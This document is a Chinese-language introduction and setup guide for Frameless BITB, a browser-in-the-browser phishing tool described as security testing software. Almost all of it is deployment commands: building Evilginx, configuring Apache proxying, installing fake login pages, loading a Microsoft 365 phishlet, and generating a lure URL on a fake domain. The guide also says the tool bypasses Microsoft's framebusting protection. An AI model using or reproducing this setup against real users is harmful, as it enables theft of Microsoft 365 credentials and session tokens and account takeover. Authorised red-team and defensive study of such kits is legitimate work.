關于Frameless BITB
Frameless BITB是一款功能強大的BitB(浏覽器中的浏覽器)安全測試工具,該工具可以幫助廣大研究人員對目标Web應用程式執行BitB安全檢測,以此提升Web應用的安全性能。
該工具不需要使用iframe,并且能夠繞過傳統的Framebusters技術,例如微軟在其登入頁面所實作的Framebusters。
工具要求
虛拟機VM
Go
Evilginx
Apache2
Phishlet
Lure
工具下載下傳&配置
Evilginx配置
點選https://help.evilginx.com/docs/intro下載下傳并建構最新版本的Evilginx。
然後将下載下傳下來的Evilginx拷貝到“/home/evilginx”。
點選https://go.dev/doc/install下載下傳并安裝最新版本Go語言環境:
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
在profile檔案中添加下列代碼:
source ~/.profile
export PATH=$PATH:/usr/local/go/bin
檢查版本安裝:
go version
安裝make:
sudo apt install make
建構:
cd /home/evilginx/evilginx2
make
為Evilginx建構代碼、phishlets和redirectors:建立一個新目錄:
mkdir /home/evilginx/evilginx
拷貝Evilginx建構代碼、phishlets和redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
快速修複Ubuntu防火牆:
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
在Ubuntu上,如果你遇到了“Failed to start nameserver on: :53”錯誤,可以嘗試修改下列檔案:
sudo nano /etc/systemd/resolved.conf
編輯/添加DNSStubListener為no > DNSStubListener=no。
然後運作下列指令即可:
sudo systemctl restart systemd-resolved
修改Evilginx配置
nano ~/.evilginx/config.json
将https_port從443修改為8443。
安裝Apache2并啟用Mods
安裝Apache2:
sudo apt install apache2 -y
啟用Apache2 mods:
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
開啟并啟用Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
此時,可以通過在浏覽器中通路VM的IP來檢視Apache和VM運作。
Frameless BITB下載下傳
安裝好Git:
sudo apt -y install git
然後使用下列指令将該項目源碼克隆至本地:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Apache自定義頁面
建立下列三個目錄,home儲存首頁,primary儲存登入頁面(背景),secondary儲存BitB視窗(前端):
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
拷貝每一個頁面目錄:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
删除預設的Apache頁面:
sudo rm -r /var/www/html/
拷貝O365 Phishlet到phishlets目錄:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
工具運作
安裝tmux,然後以開發者模式啟動Evilginx:
sudo apt install tmux -y
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
Evilginx配置:
config domain fake.com
config ipv4 127.0.0.1
需要注意的是,将Evilginx黑名單模式設定為NoAdd,将導緻Apache的黑名單失效,是以所有的Apache流量都将進來:
blacklist noadd
設定Phishlet和Lure:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
打開浏覽器通路Lure的URL位址即可。
工具使用
工具示範視訊
工具介紹:https://www.youtube.com/watch?v=p1opa2wnRvg
使用示範:https://youtu.be/luJjxpEwVHI
許可證協定
本項目的開發與釋出遵循開源許可證協定。
項目位址
Frameless BITB:https://github.com/waelmas/frameless-bitb
參考資料
https://janbakker.tech/evilginx-resources-for-microsoft-365/